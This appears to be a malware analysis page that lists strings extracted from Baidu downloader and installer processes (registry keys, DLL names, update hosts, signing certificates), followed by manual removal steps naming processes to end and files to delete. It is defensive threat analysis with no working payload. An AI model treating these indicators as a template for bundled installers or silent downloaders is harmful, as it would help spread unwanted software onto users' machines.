HKEY_CURRENT_CONFIG

bdpunchproxy.dll

bddownload_config.xml

dl.dll

\bddownloader.exe

{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}

CLSID\%s\LocalServer32

{%X-%X-%X-%X-%X%X}

Mscoree.dll

BDDownloadProxy.Downloader.1

\Installlog.txt

\bdcomproxy.dll

\7z.dll

\bdpunchproxy.dll

\dl.dll

regsvr32.exe

Kernel32.dll

7z.dll

C\StringFileInfo\xx\

netsh.exe

\\.\PhysicalDrive%d

\\.\Scsi%d:

oiphlpapi.dll

\Global.db

PBDD_Temp_Exe

%*.*f

: %s/s

%s: %s

\TDConfig.ini

H\set.log

c:\program files\common files\baidu\bddownload\107\bddownloader.exe

(1-10240)

1.0.107.0

baiduanTray.exe_2772:

.text

`.rdata

@.data

.rsrc

@.reloc

u%SVW

;9u.SWj

8.uwS

n<.ut

;:u.SWj

SSSSSh

L$.UQf

%d.%d.%d

libprotobuf %s %s:%d] %s

..\src\google\protobuf\stubs\common.cc

..\src\google\protobuf\message_lite.cc

CHECK failed: !coded_out.HadError():

..\src\google\protobuf\io\coded_stream.cc

CHECK failed: (from.GetDescriptor()) == (descriptor):

..\src\google\protobuf\message.cc

: Tried to copy from a message with a different type.to:

..\src\google\protobuf\wire_format.cc

..\src\google\protobuf\reflection_ops.cc

..\src\google\protobuf\generated_message_reflection.cc

..\src\google\protobuf\descriptor.cc

". To use it here, please add the necessary import.

", which is not imported by "

$0$1 = $2

$0$1 $2 $3 = $4

.PLACEHOLDER_VALUE

.placeholder.proto

map key must name a scalar or string field.

map_key must not name a repeated field.

CHECK failed: dynamic.get() != NULL:

.foo = value".

.dummy

FieldDescriptorProto.extendee set for non-extension field.

FieldDescriptorProto.extendee not set for extension field.

Files that do not use optimize_for = LITE_RUNTIME cannot import files which do use this option. This file is not lite, but it imports "

CHECK failed: !out.HadError():

" is repeated. Repeated options are not supported.

Import "

Missing field: FileDescriptorProto.name.

File recursively imports itself:

..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc

\xx

..\src\google\protobuf\stubs\strutil.cc

..\src\google\protobuf\extension_set.cc

CHECK failed: iter != extensions_.end():

..\src\google\protobuf\extension_set_heavy.cc

..\src\google\protobuf\descriptor.pb.cc

google/protobuf/descriptor.proto

google/protobuf/descriptor.proto

google.protobuf"G

2$.google.protobuf.FileDescriptorProto"

2 .google.protobuf.DescriptorProto

2$.google.protobuf.EnumDescriptorProto

2'.google.protobuf.ServiceDescriptorProto

2%.google.protobuf.FieldDescriptorProto

.google.protobuf.FileOptions

.google.protobuf.SourceCodeInfo"

2/.google.protobuf.DescriptorProto.ExtensionRange

.google.protobuf.MessageOptions

2 .google.protobuf.FieldDescriptorProto.Label

2*.google.protobuf.FieldDescriptorProto.Type

.google.protobuf.FieldOptions"

2).google.protobuf.EnumValueDescriptorProto

.google.protobuf.EnumOptions"l

2!.google.protobuf.EnumValueOptions"

2&.google.protobuf.MethodDescriptorProto

.google.protobuf.ServiceOptions"

.google.protobuf.MethodOptions"

2).google.protobuf.FileOptions.OptimizeMode:

2$.google.protobuf.UninterpretedOption":

2$.google.protobuf.UninterpretedOption*

2#.google.protobuf.FieldOptions.CType:

experimental_map_key

2$.google.protobuf.UninterpretedOption"/

2-.google.protobuf.UninterpretedOption.NamePart

2(.google.protobuf.SourceCodeInfo.Location

com.google.protobufB

Tokenizer::ParseInteger() passed text that could not have been tokenized as an integer:

..\src\google\protobuf\io\tokenizer.cc

Tokenizer::ParseFloat() passed text that could not have been tokenized as a float:

Tokenizer::ParseStringAppend() passed text that could not have been tokenized as a string:

..\src\google\protobuf\stubs\substitute.cc

..\src\google\protobuf\dynamic_message.cc

..\src\google\protobuf\text_format.cc

..\src\google\protobuf\descriptor_database.cc

Invalid file descriptor data passed to EncodedDescriptorDatabase::Add().

unsupported version

.\filedispatch\FileDispatch.pb.cc

c:\clientci\workspace\bdm_v2.3fix_compile\stable_proj\include\thirdInclude\google/protobuf/repeated_field.h

{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}

config_service.proto

.\BDMConfig\Protocol\config_service.pb.cc

config_service.proto"(

cmd_list

.ConfigItem"@

.ResultSet

Content-Length:%d

s.x.baidu.com

c:\clientci\workspace\bdm_v2.3fix_compile\main_proj\Source\MiniUpdate\thirdparty\google/protobuf/repeated_field.h

c:\clientci\workspace\bdm_v2.3fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp

.\update.pb.cc

%s:%u

%u.%u.%u.%u

addr %s not good...

Unsupported Media Type

HTTP Version not supported

HTTP/1.0

HTTP/1.1

1.0.0.1

.\header.pb.cc

https

ftpes

ftps

tftp

% ;?:@=&,$/-_!.~*()

System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}

%s\Connection

c:\clientci\workspace\bdm_v2.3fix_compile\basic\Output\BinRelease\BaiduAnTray.pdb

BDMSkin.dll

?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ

BDLogicUtils.dll

?BDMRegSmartCreateKey@BDMRegisterUtils@@YAHPB_WKPAPAUHKEY__@@PAK@Z

?BDMGetWindowsVersion@BDMMisc@@YAHAAKPA_WH@Z

BDMBase.dll

?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ

BDMFrameWork.dll

BDMStringUtils.dll

?BDMMsgGetModule@@YGJPAPAX@Z

BDMMsg.dll

KERNEL32.dll

USER32.dll

GDI32.dll

RegOpenKeyExW

RegCloseKey

ADVAPI32.dll

ShellExecuteW

SHFileOperationW

ShellExecuteExW

SHELL32.dll

ole32.dll

OLEAUT32.dll

SHLWAPI.dll

MSVCP80.dll

MSVCR80.dll

_amsg_exit

_wcmdln

_crt_debugger_hook

PSAPI.DLL

WTSAPI32.dll

USERENV.dll

InternetCrackUrlW

HttpOpenRequestW

HttpQueryInfoW

HttpSendRequestW

WININET.dll

NETAPI32.dll

WS2_32.dll

BDMTinyXml.dll

GetProcessHeap

RegOpenKeyExA

BaiduAnTray.exe

??_B?1??get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ@51

?get_const_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SAABV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ

?get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ

?get_mutable_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ

?instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@0AAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@A

?is_destroyed@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SA_NXZ

?t@?1??get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ@4V?$singleton_wrapper@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@detail@34@A

.?AVCBDCmdParser@BDMLogicMisc@@

.?AVCBDMConfigReportRecord@@

.?AVCPluginMenuItemExecutor@@

.?AVIPluginCmdExecutor@@

.?AVCBDMLauchReportRecord@@

.?AUPluginInfoPassiveSaver@@

.?AVCCmdPluginLauncher@@

.?AVCExePluginLauncher@@

.?AVheader@http@bena@@

.?AVresponse@http@bena@@

.?AVrequest@http@bena@@

#include "windows.h"

ÿF=

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges>

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>

03u3

00h0{0

;(<.<=<|<

5W5x5

45q5

343d3

8‡8S8]8m8r8

373s3

9—9s9

9!:4:]:|:

;&; ;?;\;

4!4;4_4|4

4Q5U5l5v5

131=1#323?3^3

9’9d9

4 4$4(4,404

6}7t7

1&1-141?1

1)12191?1

5e6S6

0!030@0|0

= =$=(=,=0=

9 9$9(9,9

\PluginSetup.xml

PackCache.xml

##cmd:

UninstalledPlugins.xml

BDMDownload.dll

/handle=%d /supplyid=%d /installmode=2 /S /D=%s

%d.%d

\GlobalPluginInfo.xml

\LocalPluginInfo.xml

\HotPlugins.xml

\HotPlugin.bnr

PluginSetup.xml

%s%d\%ld\

Download.data

download.db

publish.db

profile.db

%s_%d

%s%d\

metadata.db

\updateTips.dat

Baiduan.exe -stmd=2 -selplugin={BFB3F7A3-4FA1-466f-AB97-A96EFA9EFA6E}\{D8CD8DC5-D053-402a-99D9-47554C744B0C}

BDMQueryObj is faild is 0x%x

QueryIpcAddressHelper is faild is 0x%x

QueryIpcAddressHelper is success ,but IpcAddress List is Empty

{AF849809-EC94-47CB-80E9-1452BEC92ADA}

BDMNet.dll

{1CB69707-E42B-4128-8A00-7336B93DC262}

baiduan.exe -stmd=6

ActivateMainApp_{BFB3F7A3-4FA1-466f-AB97-A96EFA9EFA6E}\

{E9C9ED70-127F-4BE4-9821-74160A768A90}

{7576896A-4E2F-4665-AB7D-95938D2632F1}

{F5E93978-539C-476B-9A7B-B6C32025A557}

{716CE9AE-35B9-4639-B585-47F6B47B4E2D}

{D8CD8DC5-D053-402a-99D9-47554C744B0C}

BDMgr.exe -stmd=7

BDMgr.exe -stmd=6

BDMgr.exe -stmd=7 -selplugin={914438D6-1EC4-434A-B6EC-20F84894C395}

hXXp://weishi.baidu.com/feedback/

TrayPluginContainerConfig.xml

{E059A29F-D2ED-4f28-849A-851AA9D5A05C}

QQ.exe

screen_snapshot.exe

SnippingTool.exe

CommonRes.rdb

BDMUpdate.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduAn

ic_question_48_48.png

file='skin_image1.png' xtiled='true' ytiled='true'

BDASoftmgr.exe

BDASWAcc.exe

BaiduAnBugRpt.exe

BDMgr.exe -stmd=61 -prel

BaiduAn.exe

BaiduAnSvc.exe

BaiduAnUpdate.exe

Client.exe

\GameNoDisturb.ini

Shell32.dll

FreeDistractionTips.xml

BaiduAn{D8A4131D-3A7A-48a1-B080-28E1DC04F7C2}

ic_title_logo.png

btn_exit_hover_16_16.png

btn_opennodisturb_hover_16_16.png

btn_nodisturb_hover_16_16.png

btn_acc_hover_16_16.png

ico_mainpage_normal.png

btn_exit_normal_16_16.png

btn_acc_normal_16_16.png

btn_opennodisturb_normal_16_16.png

btn_nodisturb_normal_16_16.png

TrayMenu.xml

Config\config.ini

%d-%d-%d

ActivateTrayApp_{E6F42A49-F45B-4FDF-ADD8-DFAE10011BD1}

2.3.1.2372

hXXp://weishi.baidu.com

hXXp://weishi.baidu.com/privacy.html

about.xml

@advapi32.dll

QueryIpcAddressHelper

testtips.xml

D:\BDdownloads

Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}

ntdll.dll

EXPLORER.EXE

explorer.exe

B\\.\pipe\{B99F6A00-E6C9-4253-9708-C6EFB939FD53}

BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}

.bdtmp

.old_

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0

kernel32.dll

\Global.db

Fiphlpapi.dll

F\\.\PhysicalDrive%d

\\.\Scsi%d:

%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\

BaiduanTray.exe

bddownloader.exe_3936:

.text

`.rdata

@.data

.rsrc

8%uvP

;*u.SUj

PSSSSSSh

>.uTV

j SSSSSSSh

aSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

YYtCP

asio.ssl

asio.misc

D:\dl\boost_1_44_0_build\include\boost/exception/detail/exception_ptr.hpp

asio.misc error

asio.ssl error

dtrp.download.iyuntian.com

res.download.iyuntian.com

tk.download.iyuntian.com

utk.download.iyuntian.com

thread.exit_event

thread.entry_event

%s\Connection

System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}

VVV.baidu.com.cn

HTTP/1.1

$MD5Version: 1.0.0 November-19-1997 $

$Id: md5.c,v 1.1.1.1 2004/05/17 13:23:36 rcrittenden0569 Exp $

</%s>

<!--%s-->

standalone="%s"

encoding="%s"

version="%s"

&#xX;

%s='%s'

%s="%s"

PKEY_CUSTOMNAME

PKEY_PRODUCTNAME

PKEY_ISSHOW

PKEY_EXITTIME

PKEY_CUSTOMID

PKEY_START_STATUS

PKEY_GUID

PKEY_MINORVERSION

PKEY_MAJORVERSION

PKEY_COREVERSION

PKEY_EXEVERSION

PKEY_UPDATESERVERPORT

PKEY_UPDATESERVERIP

PKEY_PSHASH

PKEY_PSNAME

PKEY_EXHASH

PKEY_EXNAME

PKEY_TNHASH

PKEY_TNNAME

PKEY_COREHASH

PKEY_CORENAME

PKEY_EXEHASH

PKEY_EXENAME

PKEY_UPDATEURL

PKEY_FILENAME

PKEY_RESULT

up.download.iyuntian.com

PKEY_TTL

PKEY_ISFIX

PKEY_VERSION

PKEY_FILEEMULE_HASH

PKEY_FILEEMULE_SIZE

PKEY_FILEEMULE_NAME

PKEY_FILEBT_HASH

PKEY_FILEBT_SIZE

PKEY_FILEBT_NAME

PKEY_FILECORE_HASH

PKEY_FILECORE_SIZE

PKEY_FILECORE_NAME

PKEY_URL

PKEY_PERIOD

kernel32.dll

.mixcrt

KERNEL32.DLL

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

mscoree.dll

GetProcessWindowStation

USER32.DLL

operator

portuguese-brazilian

FhModule = %u, pfunc = %u

DbgHelp.dll

crash.dmp

0xX

DlBugReport.ini

DlBugReport.dat

%Y-%m-%d %H:%M:%S

%d.%d.%d.%d

,d-d-d d:d:d

[ 0xX ] %s [%s]

Error: Write address 0xX

Error: Read address 0xX

version = %s

%s-----------------------------------

Type: %s

Address: 0xX

bddownloader.exe

EXCEPTION_FLT_INVALID_OPERATION

EXCEPTION_FLT_DENORMAL_OPERAND

(%d,%d,%d,%d)

0xX<unknown module>:

%s::x;

0xX[%X] %s:

%s::x

Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag

Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

d:\dl\DownloadProxy_proj\Output\Release\bddownloader.pdb

GetProcessHeap

CreateIoCompletionPort

GetCPInfo

GetConsoleOutputCP

KERNEL32.dll

USER32.dll

GDI32.dll

RegDeleteKeyW

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

RegOpenKeyW

RegOpenKeyExA

ADVAPI32.dll

ShellExecuteW

SHELL32.dll

ole32.dll

OLEAUT32.dll

SHLWAPI.dll

COMCTL32.dll

WS2_32.dll

VERSION.dll

NetWkstaTransportEnum

NETAPI32.dll

PSAPI.DLL

imagehlp.dll

zcÁ

'DownloadProxy.EXE'

BDDownloadProxy.Downloader.1 = s 'Downloader Class'

CLSID = s '{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}'

BDDownloadProxy.Downloader = s 'Downloader Class'

CurVer = s 'BDDownloadProxy.Downloader.1'

ForceRemove {91B5E4DE-4C97-41CD-9F94-84BFAABB7371} = s 'Downloader Class'

ProgID = s 'BDDownloadProxy.Downloader.1'

VersionIndependentProgID = s 'BDDownloadProxy.Downloader'

'TypeLib' = s '{DA624F8F-98BF-4B03-AD11-A12D07119E81}'

stdole2.tlbWWW

cuiMsgTypeWWW

pMsgParamWWWd

6|pTaskUrl

Created by MIDL version 6.00.0366 at Thu Jan 02 17:35:38 2014

&UU*&&&&&&&&*UU(%%%%%%%%(UU)%%%%%%%%)UU.$$$$$$$$.UU1''''''''1UU

"7,,11,,7"

2222222222222222

11///20.

##!!! !!!##

.02///11

mM............................................................Mm

mM..........................................Mm

(((((((JgT..TgJ(((((((

ÿfH

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

bdpunchproxy.dll

bddownload_config.xml

dl.dll

\bddownloader.exe

{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}

CLSID\%s\LocalServer32

{%X-%X-%X-%X-%X%X}

Mscoree.dll

BDDownloadProxy.Downloader.1

\Installlog.txt

\bdcomproxy.dll

\7z.dll

\bdpunchproxy.dll

\dl.dll

regsvr32.exe

Kernel32.dll

7z.dll

C\StringFileInfo\xx\

netsh.exe

\\.\PhysicalDrive%d

\\.\Scsi%d:

oiphlpapi.dll

\Global.db

PBDD_Temp_Exe

%*.*f

: %s/s

%s: %s

\TDConfig.ini

H\set.log

c:\program files\common files\baidu\bddownload\107\bddownloader.exe

(1-10240)

1.0.107.0

spkjrjp_30279.exe_1632:

.text

`.rdata

@.data

.ndata

.rsrc

@.reloc

RegDeleteKeyExW

Kernel32.DLL

PSAPI.DLL

%s=%s

GetWindowsDirectoryW

KERNEL32.dll

ExitWindowsEx

GetAsyncKeyState

USER32.dll

GDI32.dll

SHFileOperationW

ShellExecuteW

SHELL32.dll

RegDeleteKeyW

RegCloseKey

RegEnumKeyW

RegOpenKeyExW

RegCreateKeyExW

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

SsH/b

.sI h

qdZz%x

s}p%c

> >$>(>,>0>|>

Thawte Certification1

hXXp://ocsp.thawte.com0

.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0

hXXp://ts-ocsp.ws.symantec.com07

 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<

 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(

.Class 3 Public Primary Certification Authority0

<VeriSign Class 3 Public Primary Certification Authority - G50

hXXp://crl.verisign.com/pca3.crl0

hXXps://VVV.verisign.com/cps0

#hXXp://logo.verisign.com/vslogo.gif04

hXXp://ocsp.verisign.com0>

DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0

n.aAHu

2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,

2Beijing baidu Netcom science and technology co.ltd1>0<

2Beijing baidu Netcom science and technology co.ltd0

/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D

hXXps://VVV.verisign.com/rpa0

hXXp://ocsp.verisign.com0;

/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0

hXXps://VVV.verisign.com/cps0*

#hXXp://crl.verisign.com/pca3-g5.crl04

hXXp://ocsp.verisign.com0

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

logging set to %d

settings logging to %d

created uninstaller: %d, "%s"

WriteReg: error creating key "%s\%s"

WriteReg: error writing into "%s\%s" "%s"

WriteRegBin: "%s\%s" "%s"="%s"

WriteRegDWORD: "%s\%s" "%s"="0xx"

WriteRegExpandStr: "%s\%s" "%s"="%s"

WriteRegStr: "%s\%s" "%s"="%s"

DeleteRegKey: "%s\%s"

DeleteRegValue: "%s\%s" "%s"

WriteINIStr: wrote [%s] %s=%s in %s

CopyFiles "%s"->"%s"

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d

Error registering DLL: Could not load %s

Error registering DLL: %s not found in %s

GetTTFFontName(%s) returned %s

GetTTFVersionString(%s) returned %s

Exec: failed createprocess ("%s")

Exec: success ("%s")

Exec: command="%s"

ExecShell: success ("%s": file:"%s" params:"%s")

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d

Exch: stack < %d elements

RMDir: "%s"

MessageBox: %d,"%s"

Delete: "%s"

File: wrote %d to "%s"

File: skipped: "%s" (overwriteflag=%d)

File: error creating "%s"

File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"

Rename failed: %s

Rename on reboot: %s

Rename: %s

IfFileExists: file "%s" does not exist, jumping %d

IfFileExists: file "%s" exists, jumping %d

CreateDirectory: "%s" created

CreateDirectory: can't create "%s" - a file already exists

CreateDirectory: can't create "%s" (err=%d)

CreateDirectory: "%s" (%d)

SetFileAttributes: "%s":X

Sleep(%d)

detailprint: %s

Call: %d

Aborting: "%s"

Jump: %d

verifying installer: %d%%

unpacking data: %d%%

... %d%%

hXXp://nsis.sf.net/NSIS_Error

~nsu.tmp

install.log

%u.%u%s%s

Skipping section: "%s"

Section: "%s"

New install of "%s" to "%s"

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

*?|<>/":

invalid registry key

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

HKEY_PERFORMANCE_DATA

HKEY_USERS

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

x%c

RMDir: RemoveDirectory failed("%s")

RMDir: RemoveDirectory on Reboot("%s")

RMDir: RemoveDirectory("%s")

RMDir: RemoveDirectory invalid input("%s")

Delete: DeleteFile failed("%s")

Delete: DeleteFile on Reboot("%s")

Delete: DeleteFile("%s")

%s: failed opening file "%s"

LOCALS~1\Temp\nsw1A.tmp\tmpt5zprs.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw1A.tmp\tmpt5zprs.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw1A.tmp

spkjrjp_30279.exe"

Nullsoft Install System v2.46.5-Unicode

%Program Files%\Baidu\

sw1A.tmp

File: skipped: "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw1A.tmp\tmpt5zprs.dll" (overwriteflag=1)

p\tmpt5zprs.dll"

:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\spkjrjp_30279.exe"

"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\spkjrjp_30279.exe"

%Program Files%\Baidu\BaiduSd

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp

spkjrjp_30279.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr18.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\spkjrjp_30279.exe

302647013

1.0.9.757

services.exe_756_rwx_00AE0000_00001000:

%Program Files%\Baidu\BaiduAn\2.3.0.2225\bd0001.dll

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Scan a system with an anti-rootkit tool.
Terminate malicious process(es) (How to End a Process With the Task Manager):

wwwww_3340.exe:3720
vcredist_x86.exe:2720
netsh.exe:3112
bddownloader.exe:2984
guagua_77150006814.exe:1016
sc.exe:1336
sc.exe:644
BDDownloader.exe:2084
BDDownloader.exe:2804
MsiExec.exe:3196
candid.exe:1548
pczh_107_306.exe:828
baiduanTray.exe:2772
spkjrjp_30279.exe:1632
yymusic05.exe:2308
regsvr32.exe:3184
BDALeakfixer.exe:3640
BaiduAn.exe:3516
BaiduAn.exe:3208
BaiduAnSvc.exe:3884
BaiduAnSvc.exe:3732
oovmdw_70745.exe:444
BDASWAcc.exe:316
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

%Documents and Settings%\%current user%\Start Menu\Programs\yyfm0529\yyfm0529.lnk (840 bytes)
%Program Files%\yyfm0529\2014081705\Data\version.ini (32 bytes)
%Program Files%\yyfm0529\2014081705\swresample-0.dll (3312 bytes)
%Program Files%\yyfm0529\2014081705\Data\user2.ini (40 bytes)
%Program Files%\yyfm0529\2014081705\yymusic05.exe (63950 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\yyfm0529\Ã‚Â¹Ãƒâ„¢Ã‚Â·Ã‚Â½Ãƒâ€“ÃƒÂ·Ãƒâ€™Ã‚Â³.lnk (334 bytes)
%Program Files%\yyfm0529\2014081705\audio.dll (3616 bytes)
%Program Files%\yyfm0529\2014081705\pthreadGC2.dll (3616 bytes)
%Program Files%\yyfm0529\2014081705\avutil-52.dll (5520 bytes)
%Program Files%\yyfm0529\2014081705\Data\client.ini (36 bytes)
%Program Files%\yyfm0529\2014081705\favorfm.xml (440 bytes)
%Program Files%\yyfm0529\2014081705\DuiLib.dll (16288 bytes)
%Program Files%\yyfm0529\2014081705\Data\setup.ini (110 bytes)
%Program Files%\yyfm0529\2014081705\Data\dh.ini (56 bytes)
%Program Files%\yyfm0529\2014081705\channels.xml (784 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\yyfm0529\Ãƒâ€¦ÃƒÂ¤Ãƒâ€“ÃƒÆ’Ã‚Â¹Ã‚Â¤Ã‚Â¾ÃƒÅ¸\ÃƒÂÃ‚Â¶Ãƒâ€ÃƒËœyyfm0529.lnk (830 bytes)
%Program Files%\yyfm0529\2014081705\libav.dll (6360 bytes)
%Program Files%\yyfm0529\2014081705\Unins.exe (9608 bytes)
%Program Files%\yyfm0529\2014081705\YFMSever.exe (23936 bytes)
%Program Files%\yyfm0529\2014081705\avcore.dll (2392 bytes)
%Program Files%\yyfm0529\2014081705\avcodec-54.dll (23936 bytes)
%Program Files%\yyfm0529\2014081705\source.dll (6584 bytes)
%Program Files%\yyfm0529\2014081705\SysConfig.ini (256 bytes)
%Program Files%\yyfm0529\2014081705\avformat-54.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\vcredis1.cab (6255 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\vcredist.msi (42423 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDMWrench.sys.tmp.bdl (6441 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\dnw.xml.tmp.bdl (241 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\NSISdl.dll (14 bytes)
